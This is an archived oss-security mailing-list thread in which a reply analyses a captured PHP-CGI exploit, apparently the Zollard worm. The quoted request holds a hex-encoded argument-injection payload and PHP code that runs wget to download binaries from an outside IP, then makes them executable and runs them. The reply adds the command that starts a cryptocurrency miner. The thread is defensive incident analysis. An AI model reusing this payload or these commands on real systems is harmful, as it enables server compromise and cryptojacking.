[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 10 Oct 2014 21:55:06 +0200
From: Pierre Schweitzer <pierre@...ctos.org>
To: oss-security@...ts.openwall.com
Subject: Re: What does this PHP exploit do?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dear Dave,
Going quickly through the PHP script shows that it downloads lots of
executables for various architectures to then try to run them (hence
the chmod +x) on the host it was downloaded. So pretty portable worm.
The executable it downloads appears to have two basic functions:
- -> replicating itself over the network
- -> starting a cryptocurrency miner (CPU miner) on the infected host
Here is the way it starts the miner:
./minerd -q -B -a scrypt -o http://p2pool.org:5643 -u
MDFepZz9SpSbFSugUsXVE3CmrdTaKg1SWi -p pass
Cheers,
Pierre
On 10/10/2014 21:28, Dave Horsfall wrote:
> My apologies if this is off-topic for this list, but out of all the
> security lists of which I am a member this seems to be the closest
> one that fits, so please point me to a more appropriate one in that
> case..
>
> I'm trying to figure out what this exploit does; it started around
> the time that Shellshock did, but I don't think that they're
> related.
>
> It downloads binaries for several architectures (even a MIPS) which
> amongst other things futzes around with IPTABLES (including
> blocking the TELNET port) and appears to be self-reproducing.
>
> The hex-encoded stuff in the script below decodes to
>
> "-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n"
>
>
> but my PHP-fu doesn't quite extend that far (and that
> "safe_mode=off" looks a bit suss).
>
> Script below, kindly supplied by 0wned boxes the world over (in
> this case, Korea):
>
> POST
> /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
> HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (compatible;
> Zollard; Linux) Content-Type: application/x-www-form-urlencoded
> Content-Length: 1817 Connection: close
>
> <?php echo "Zollard"; $disablefunc =
> @ini_get("disable_functions"); if (!empty($disablefunc)) {
> $disablefunc = str_replace(" ","",$disablefunc); $disablefunc =
> explode(",",$disablefunc); } function myshellexec($cmd) { global
> $disablefunc; $result = ""; if (!empty($cmd)) { if
> (is_callable("exec") and !in_array("exec",$disablefunc))
> {exec($cmd,$result); $result = join("\n",$result);} elseif
> (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and
> !in_array("system",$disablefunc)) {$v = @ob_get_contents();
> @ob_clean(); system($cmd); $result = @ob_get_contents();
> @ob_clean(); echo $v;} elseif (is_callable("passthru") and
> !in_array("passthru",$disablefunc)) {$v = @ob_get_contents();
> @ob_clean(); passthru($cmd); $result = @ob_get_contents();
> @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r")))
> { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);}
> pclose($fp); } } return $result; } myshellexec("rm -rf
> /tmp/armeabi;wget -P /tmp http://119.206.52.15:58455/armeabi;chmod
> +x /tmp/armeabi"); myshellexec("rm -rf /tmp/arm;wget -P /tmp
> http://119.206.52.15:58455/arm;chmod +x /tmp/arm"); myshellexec("rm
> -rf /tmp/ppc;wget -P /tmp http://119.206.52.15:58455/ppc;chmod +x
> /tmp/ppc"); myshellexec("rm -rf /tmp/mips;wget -P /tmp
> http://119.206.52.15:58455/mips;chmod +x /tmp/mips");
> myshellexec("rm -rf /tmp/mipsel;wget -P /tmp
> http://119.206.52.15:58455/mipsel;chmod +x /tmp/mipsel");
> myshellexec("rm -rf /tmp/x86;wget -P /tmp
> http://119.206.52.15:58455/x86;chmod +x /tmp/x86"); myshellexec("rm
> -rf /tmp/nodes;wget -P /tmp http://119.206.52.15:58455/nodes;chmod
> +x /tmp/nodes"); myshellexec("rm -rf /tmp/sig;wget -P /tmp
> http://119.206.52.15:58455/sig;chmod +x /tmp/sig");
> myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
>
> -- Dave
>
- --
Pierre Schweitzer <pierre at reactos.org>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJUODmaAAoJEHVFVWw9WFsL+3oP/Aqok/rKbNXyZ63W3A9RALNa
RVRDxh8WU7onJQjYoKgGO3uah1P42c1QCRA0wxVjfb1N0YS5IY7zp+LfEW4RKUyW
ziBn15zHRo2o7AAgnFfAFOJ4A9XEpkPRTx41SZXSjJwuG6j9WzTeg0LyKBowerYu
dsxETeYu7/TAAYCLT5i6TM+5g6RxIfEYRbX4MAQ8hP7/6PZF7Zc6pO+nZNBypxDt
trEdWHIFjnEnMnlJVy6lbK05/6X0EdMf2cJhPxcGmXxcLMwg8gdsSfDlRCMBewGn
NdtxDX4UnVBM0KvYmp6Wp5x+/Iow8n5F+sB07ZRnMRNJVajYB1gMR+aLzG/SjbHW
eBNXPa599QaefoeVw94xwq0Zf9kGHbk0iyprD/nCu5Gsv80IUAkSmNWkzfpvPZST
9tXypLxXrOVZdyQUAhP6L5UYOMMMAddrcpCKSTtffzWP7TZEpkHA8xq+pRxMZwDJ
1llf8/jMyWwHMO61l5jkW+xMEhEy6gTjMsMYyvJ8y/jhPkOFB/C1xD0Y2vjrXBjp
BC0PVuEIYN66Mr+LvnMzsO39oCnl1pJC/X3lru/e5eypEKhpDGEpnc0JpKokuyYT
pgFw80BIrmy6q2dIhZX19whxD18ttlfW7sSp1nQ4BVeNO2wGuijbxOcNnmmJOnMu
5MBbzh8SuHo8I+kcgPN9
=NAuN
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
